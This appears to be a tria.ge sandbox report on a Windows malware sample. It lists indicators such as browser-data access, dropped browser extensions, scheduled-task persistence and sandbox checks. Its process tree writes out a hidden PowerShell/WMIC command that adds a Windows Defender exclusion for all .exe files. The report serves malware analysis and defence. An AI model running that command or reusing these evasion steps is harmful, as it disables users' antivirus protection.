Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
163s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
11/07/2024, 22:34
Static task
static1
Behavioral task
behavioral1
Sample
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
Resource
win7-20240704-en
General
-
Target
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe
-
Size
7.2MB
-
MD5
b31e27b00781e72004147d1d49675fef
-
SHA1
8a7529ea0b52c8cdf2ee0c85ec0af09dcd9c157f
-
SHA256
56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad
-
SHA512
35310f9a55916758403f212344758156cf56a90c8cbab4d0d87e0e96db9a94da8526b5df7083e4b26938da9dd79ed201bc1950a320c1fee162a4098ccb188044
-
SSDEEP
196608:91OHzJaVk0fZhEF8H7v5467/tfE/UOYAOC2oMbnus8G8:3OHzJaVpEF8bq67/tcULCXMCsF8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 34 4856 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 528 powershell.exe 1616 powershell.EXE 2152 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Control Panel\International\Geo\Nation mdAXtPS.exe -
Executes dropped EXE 4 IoCs
pid Process 3768 Install.exe 4920 Install.exe 712 Install.exe 5032 mdAXtPS.exe -
Loads dropped DLL 1 IoCs
pid Process 4856 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json mdAXtPS.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mdAXtPS.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 mdAXtPS.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 mdAXtPS.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 mdAXtPS.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mdAXtPS.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mdAXtPS.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 mdAXtPS.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\ixMyiQryENPMC\ccxxcZX.dll mdAXtPS.exe File created C:\Program Files (x86)\ixMyiQryENPMC\CuTPMYm.xml mdAXtPS.exe File created C:\Program Files (x86)\WIQLPldOU\HKgHFn.dll mdAXtPS.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi mdAXtPS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mdAXtPS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mdAXtPS.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mdAXtPS.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\qHQKfgCHjFinf.dll mdAXtPS.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\jJQVFBu.xml mdAXtPS.exe File created C:\Program Files (x86)\fjxFshYjVWUn\oqAnAvR.dll mdAXtPS.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\PHBWplQ.dll mdAXtPS.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi mdAXtPS.exe File created C:\Program Files (x86)\WIQLPldOU\dRuFPYX.xml mdAXtPS.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GylyHog.xml mdAXtPS.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\AxfyqSaZTcFttLJtv.job schtasks.exe File created C:\Windows\Tasks\zuAKRFeuERsPXGg.job schtasks.exe File created C:\Windows\Tasks\cTixPRTTdvXlYhynT.job schtasks.exe File created C:\Windows\Tasks\blQxnfAaNNFZMWpemd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 2296 712 WerFault.exe 84 4656 4920 WerFault.exe 74 204 5032 WerFault.exe 154 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mdAXtPS.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" mdAXtPS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mdAXtPS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fc2686-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mdAXtPS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mdAXtPS.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4580 schtasks.exe 3076 schtasks.exe 4616 schtasks.exe 4224 schtasks.exe 2580 schtasks.exe 32 schtasks.exe 3252 schtasks.exe 168 schtasks.exe 4592 schtasks.exe 2408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 528 powershell.exe 528 powershell.exe 528 powershell.exe 4856 powershell.exe 4856 powershell.exe 4856 powershell.exe 3860 powershell.exe 3860 powershell.exe 3860 powershell.exe 1616 powershell.EXE 1616 powershell.EXE 1616 powershell.EXE 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 2152 powershell.exe 2152 powershell.exe 2152 powershell.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe 5032 mdAXtPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 528 powershell.exe Token: SeIncreaseQuotaPrivilege 4136 WMIC.exe Token: SeSecurityPrivilege 4136 WMIC.exe Token: SeTakeOwnershipPrivilege 4136 WMIC.exe Token: SeLoadDriverPrivilege 4136 WMIC.exe Token: SeSystemProfilePrivilege 4136 WMIC.exe Token: SeSystemtimePrivilege 4136 WMIC.exe Token: SeProfSingleProcessPrivilege 4136 WMIC.exe Token: SeIncBasePriorityPrivilege 4136 WMIC.exe Token: SeCreatePagefilePrivilege 4136 WMIC.exe Token: SeBackupPrivilege 4136 WMIC.exe Token: SeRestorePrivilege 4136 WMIC.exe Token: SeShutdownPrivilege 4136 WMIC.exe Token: SeDebugPrivilege 4136 WMIC.exe Token: SeSystemEnvironmentPrivilege 4136 WMIC.exe Token: SeRemoteShutdownPrivilege 4136 WMIC.exe Token: SeUndockPrivilege 4136 WMIC.exe Token: SeManageVolumePrivilege 4136 WMIC.exe Token: 33 4136 WMIC.exe Token: 34 4136 WMIC.exe Token: 35 4136 WMIC.exe Token: 36 4136 WMIC.exe Token: SeIncreaseQuotaPrivilege 4136 WMIC.exe Token: SeSecurityPrivilege 4136 WMIC.exe Token: SeTakeOwnershipPrivilege 4136 WMIC.exe Token: SeLoadDriverPrivilege 4136 WMIC.exe Token: SeSystemProfilePrivilege 4136 WMIC.exe Token: SeSystemtimePrivilege 4136 WMIC.exe Token: SeProfSingleProcessPrivilege 4136 WMIC.exe Token: SeIncBasePriorityPrivilege 4136 WMIC.exe Token: SeCreatePagefilePrivilege 4136 WMIC.exe Token: SeBackupPrivilege 4136 WMIC.exe Token: SeRestorePrivilege 4136 WMIC.exe Token: SeShutdownPrivilege 4136 WMIC.exe Token: SeDebugPrivilege 4136 WMIC.exe Token: SeSystemEnvironmentPrivilege 4136 WMIC.exe Token: SeRemoteShutdownPrivilege 4136 WMIC.exe Token: SeUndockPrivilege 4136 WMIC.exe Token: SeManageVolumePrivilege 4136 WMIC.exe Token: 33 4136 WMIC.exe Token: 34 4136 WMIC.exe Token: 35 4136 WMIC.exe Token: 36 4136 WMIC.exe Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 3860 powershell.exe Token: SeDebugPrivilege 1616 powershell.EXE Token: SeDebugPrivilege 2152 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3032 WMIC.exe Token: SeIncreaseQuotaPrivilege 3032 WMIC.exe Token: SeSecurityPrivilege 3032 WMIC.exe Token: SeTakeOwnershipPrivilege 3032 WMIC.exe Token: SeLoadDriverPrivilege 3032 WMIC.exe Token: SeSystemtimePrivilege 3032 WMIC.exe Token: SeBackupPrivilege 3032 WMIC.exe Token: SeRestorePrivilege 3032 WMIC.exe Token: SeShutdownPrivilege 3032 WMIC.exe Token: SeSystemEnvironmentPrivilege 3032 WMIC.exe Token: SeUndockPrivilege 3032 WMIC.exe Token: SeManageVolumePrivilege 3032 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3032 WMIC.exe Token: SeIncreaseQuotaPrivilege 3032 WMIC.exe Token: SeSecurityPrivilege 3032 WMIC.exe Token: SeTakeOwnershipPrivilege 3032 WMIC.exe Token: SeLoadDriverPrivilege 3032 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1468 wrote to memory of 3768 1468 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 73 PID 1468 wrote to memory of 3768 1468 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 73 PID 1468 wrote to memory of 3768 1468 56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe 73 PID 3768 wrote to memory of 4920 3768 Install.exe 74 PID 3768 wrote to memory of 4920 3768 Install.exe 74 PID 3768 wrote to memory of 4920 3768 Install.exe 74 PID 4920 wrote to memory of 1616 4920 Install.exe 76 PID 4920 wrote to memory of 1616 4920 Install.exe 76 PID 4920 wrote to memory of 1616 4920 Install.exe 76 PID 1616 wrote to memory of 5044 1616 forfiles.exe 78 PID 1616 wrote to memory of 5044 1616 forfiles.exe 78 PID 1616 wrote to memory of 5044 1616 forfiles.exe 78 PID 5044 wrote to memory of 528 5044 cmd.exe 79 PID 5044 wrote to memory of 528 5044 cmd.exe 79 PID 5044 wrote to memory of 528 5044 cmd.exe 79 PID 528 wrote to memory of 4136 528 powershell.exe 80 PID 528 wrote to memory of 4136 528 powershell.exe 80 PID 528 wrote to memory of 4136 528 powershell.exe 80 PID 4920 wrote to memory of 3076 4920 Install.exe 82 PID 4920 wrote to memory of 3076 4920 Install.exe 82 PID 4920 wrote to memory of 3076 4920 Install.exe 82 PID 712 wrote to memory of 4856 712 Install.exe 85 PID 712 wrote to memory of 4856 712 Install.exe 85 PID 712 wrote to memory of 4856 712 Install.exe 85 PID 4856 wrote to memory of 1000 4856 powershell.exe 87 PID 4856 wrote to memory of 1000 4856 powershell.exe 87 PID 4856 wrote to memory of 1000 4856 powershell.exe 87 PID 1000 wrote to memory of 4760 1000 cmd.exe 88 PID 1000 wrote to memory of 4760 1000 cmd.exe 88 PID 1000 wrote to memory of 4760 1000 cmd.exe 88 PID 4856 wrote to memory of 4388 4856 powershell.exe 89 PID 4856 wrote to memory of 4388 4856 powershell.exe 89 PID 4856 wrote to memory of 4388 4856 powershell.exe 89 PID 4856 wrote to memory of 1608 4856 powershell.exe 90 PID 4856 wrote to memory of 1608 4856 powershell.exe 90 PID 4856 wrote to memory of 1608 4856 powershell.exe 90 PID 4856 wrote to memory of 2120 4856 powershell.exe 91 PID 4856 wrote to memory of 2120 4856 powershell.exe 91 PID 4856 wrote to memory of 2120 4856 powershell.exe 91 PID 4856 wrote to memory of 5084 4856 powershell.exe 92 PID 4856 wrote to memory of 5084 4856 powershell.exe 92 PID 4856 wrote to memory of 5084 4856 powershell.exe 92 PID 4856 wrote to memory of 1816 4856 powershell.exe 93 PID 4856 wrote to memory of 1816 4856 powershell.exe 93 PID 4856 wrote to memory of 1816 4856 powershell.exe 93 PID 4856 wrote to memory of 3616 4856 powershell.exe 94 PID 4856 wrote to memory of 3616 4856 powershell.exe 94 PID 4856 wrote to memory of 3616 4856 powershell.exe 94 PID 4856 wrote to memory of 4428 4856 powershell.exe 95 PID 4856 wrote to memory of 4428 4856 powershell.exe 95 PID 4856 wrote to memory of 4428 4856 powershell.exe 95 PID 4856 wrote to memory of 2360 4856 powershell.exe 96 PID 4856 wrote to memory of 2360 4856 powershell.exe 96 PID 4856 wrote to memory of 2360 4856 powershell.exe 96 PID 4856 wrote to memory of 4604 4856 powershell.exe 97 PID 4856 wrote to memory of 4604 4856 powershell.exe 97 PID 4856 wrote to memory of 4604 4856 powershell.exe 97 PID 4856 wrote to memory of 3800 4856 powershell.exe 98 PID 4856 wrote to memory of 3800 4856 powershell.exe 98 PID 4856 wrote to memory of 3800 4856 powershell.exe 98 PID 4856 wrote to memory of 3824 4856 powershell.exe 99 PID 4856 wrote to memory of 3824 4856 powershell.exe 99 PID 4856 wrote to memory of 3824 4856 powershell.exe 99 PID 4856 wrote to memory of 1432 4856 powershell.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"C:\Users\Admin\AppData\Local\Temp\56d713bf7ccc456c6b29b7362b08dfa7e200acc0b21b283d949a54f3a27042ad.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Users\Admin\AppData\Local\Temp\7zS86B4.tmp\Install.exe.\Install.exe /BRSVdidGUSXG "385132" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
-
-
-
